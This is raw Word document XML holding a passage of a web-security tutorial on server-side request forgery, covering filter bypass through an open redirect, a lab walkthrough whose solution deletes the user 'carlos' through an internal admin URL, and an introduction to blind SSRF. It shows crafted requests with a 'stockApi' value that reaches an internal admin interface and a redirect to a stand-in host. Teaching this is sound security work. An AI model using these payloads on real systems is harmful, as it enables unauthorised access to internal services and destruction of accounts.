    <w:p w14:paraId="0B6CD3EE" w14:textId="77777777" w:rsidR="008371A8" w:rsidRPr="00E4142C" w:rsidRDefault="008371A8" w:rsidP="008371A8">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In the preceding SSRF example, suppose the user-submitted URL is strictly validated to prevent malicious exploitation of the SSRF behavior. However, the application whose URLs are allowed contains an open redirection vulnerability. Provided the API used to make the back-end HTTP request supports redirections, you can construct a URL that satisfies the filter and results in a redirected request to the desired back-end target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690B0157" w14:textId="77777777" w:rsidR="008371A8" w:rsidRPr="00E4142C" w:rsidRDefault="008371A8" w:rsidP="008371A8">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For example, suppose the application contains an open redirection vulnerability in which the following URL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663F4311" w14:textId="77777777" w:rsidR="008371A8" w:rsidRPr="00E4142C" w:rsidRDefault="008371A8" w:rsidP="008371A8">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>/product/nextProduct?currentProductId=6&amp;path=http://evil-user.net</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FCC290" w14:textId="77777777" w:rsidR="008371A8" w:rsidRPr="00E4142C" w:rsidRDefault="008371A8" w:rsidP="008371A8">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returns a redirection to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C0CA8E" w14:textId="77777777" w:rsidR="008371A8" w:rsidRPr="00E4142C" w:rsidRDefault="008371A8" w:rsidP="008371A8">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>http://evil-user.net</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292784ED" w14:textId="77777777" w:rsidR="008371A8" w:rsidRPr="00E4142C" w:rsidRDefault="008371A8" w:rsidP="008371A8">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You can leverage the open redirection vulnerability to bypass the URL filter, and exploit the SSRF vulnerability as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C233BAE" w14:textId="77777777" w:rsidR="008371A8" w:rsidRPr="00E4142C" w:rsidRDefault="008371A8" w:rsidP="008371A8">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>POST /product/stock HTTP/1.0</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Content-Type: application/x-www-form-urlencoded</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Content-Length: 118</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>stockApi=http://weliketoshop.net/product/nextProduct?currentProductId=6&amp;path=http://192.168.0.68/admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB57C46" w14:textId="77777777" w:rsidR="008371A8" w:rsidRPr="00E4142C" w:rsidRDefault="008371A8" w:rsidP="008371A8">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>This SSRF exploit works because the application first validates that the supplied </w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>stockAPI</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t> URL is on an allowed domain, which it is. The application then requests the supplied URL, which triggers the open redirection. It follows the redirection, and makes a request to the internal URL of the attacker's choosing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7EDD13" w14:textId="77777777" w:rsidR="001822E8" w:rsidRPr="00E4142C" w:rsidRDefault="001822E8" w:rsidP="001822E8">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Lab: SSRF with filter bypass via open redirection vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41105F28" w14:textId="77777777" w:rsidR="001822E8" w:rsidRPr="001822E8" w:rsidRDefault="001822E8" w:rsidP="001822E8">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001822E8">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>This lab has a stock check feature which fetches data from an internal system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1F4737" w14:textId="77777777" w:rsidR="001822E8" w:rsidRPr="001822E8" w:rsidRDefault="001822E8" w:rsidP="001822E8">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001822E8">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>To solve the lab, change the stock check URL to access the admin interface at </w:t>
      </w:r>
      <w:r w:rsidRPr="001822E8">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>http://192.168.0.12:8080/admin</w:t>
      </w:r>
      <w:r w:rsidRPr="001822E8">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t> and delete the user </w:t>
      </w:r>
      <w:r w:rsidRPr="001822E8">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>carlos</w:t>
      </w:r>
      <w:r w:rsidRPr="001822E8">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FBDFF9" w14:textId="77777777" w:rsidR="001822E8" w:rsidRPr="001822E8" w:rsidRDefault="001822E8" w:rsidP="001822E8">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001822E8">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The stock checker has been restricted to only access the local application, so you will need to find an open redirect affecting the application first.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662049C1" w14:textId="77777777" w:rsidR="001822E8" w:rsidRPr="00E4142C" w:rsidRDefault="001822E8" w:rsidP="001822E8">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EBF0F2"/>
        <w:spacing w:before="0"/>
        <w:textAlignment w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>Solution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBA65A0" w14:textId="77777777" w:rsidR="001822E8" w:rsidRPr="00E4142C" w:rsidRDefault="001822E8" w:rsidP="001822E8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>Visit a product, click "Check stock", intercept the request in Burp Suite, and send it to Burp Repeater.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD99646" w14:textId="77777777" w:rsidR="001822E8" w:rsidRPr="00E4142C" w:rsidRDefault="001822E8" w:rsidP="001822E8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>Try tampering with the </w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>stockApi</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t> parameter and observe that it isn't possible to make the server issue the request directly to a different host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3266CBAE" w14:textId="77777777" w:rsidR="001822E8" w:rsidRPr="00E4142C" w:rsidRDefault="001822E8" w:rsidP="001822E8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>Click "next product" and observe that the </w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>path</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t> parameter is placed into the Location header of a redirection response, resulting in an open redirection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA09A4B" w14:textId="77777777" w:rsidR="001822E8" w:rsidRPr="00E4142C" w:rsidRDefault="001822E8" w:rsidP="001822E8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>Create a URL that exploits the open redirection vulnerability, and redirects to the admin interface, and feed this into the </w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>stockApi</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t> parameter on the stock checker:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>/product/nextProduct?path=http://192.168.0.12:8080/admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284BFF0C" w14:textId="77777777" w:rsidR="001822E8" w:rsidRPr="00E4142C" w:rsidRDefault="001822E8" w:rsidP="001822E8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>Observe that the stock checker follows the redirection and shows you the admin page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068433FF" w14:textId="77777777" w:rsidR="001822E8" w:rsidRPr="00E4142C" w:rsidRDefault="001822E8" w:rsidP="001822E8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>Amend the path to delete the target user: </w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>/product/nextProduct?path=http://192.168.0.12:8080/admin/delete?username=carlos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611C0A53" w14:textId="77777777" w:rsidR="008F55AC" w:rsidRPr="00E4142C" w:rsidRDefault="008F55AC" w:rsidP="008F55AC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Blind SSRF vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC4ED92" w14:textId="77777777" w:rsidR="008F55AC" w:rsidRPr="00E4142C" w:rsidRDefault="008F55AC" w:rsidP="008F55AC">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Blind SSRF vulnerabilities arise when an application can be induced to issue a back-end HTTP request to a supplied URL, but the response from the back-end request is not returned in the application's front-end response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CDA9E3B" w14:textId="77777777" w:rsidR="008F55AC" w:rsidRPr="00E4142C" w:rsidRDefault="008F55AC" w:rsidP="008F55AC">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Blind SSRF is generally harder to exploit but can sometimes lead to full remote code execution on the server or other back-end components.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6A239D" w14:textId="77777777" w:rsidR="00DB1B0B" w:rsidRPr="00E4142C" w:rsidRDefault="00DB1B0B" w:rsidP="00DB1B0B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>What is the impact of blind SSRF vulnerabilities?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE5170C" w14:textId="77777777" w:rsidR="00DB1B0B" w:rsidRPr="00E4142C" w:rsidRDefault="00DB1B0B" w:rsidP="00DB1B0B">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The impact of blind SSRF vulnerabilities is often lower than fully informed SSRF vulnerabilities because of their one-way nature. They cannot be trivially exploited to retrieve sensitive data from back-end systems, although in some situations they can be exploited to achieve full remote code execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB21F77" w14:textId="77777777" w:rsidR="00DB1B0B" w:rsidRPr="00E4142C" w:rsidRDefault="00DB1B0B" w:rsidP="00DB1B0B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>How to find and exploit blind SSRF vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126E1EF4" w14:textId="77777777" w:rsidR="00DB1B0B" w:rsidRPr="00E4142C" w:rsidRDefault="00DB1B0B" w:rsidP="00DB1B0B">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The most reliable way to detect blind SSRF vulnerabilities is using out-of-band (</w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="00E4142C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
            <w:color w:val="FF6633"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>OAST</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>) techniques. This involves attempting to trigger an HTTP request to an external system that you control, and monitoring for network interactions with that system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A640E6" w14:textId="77777777" w:rsidR="00DB1B0B" w:rsidRPr="00E4142C" w:rsidRDefault="00DB1B0B" w:rsidP="00DB1B0B">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The easiest and most effective way to use out-of-band techniques is using </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="00E4142C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
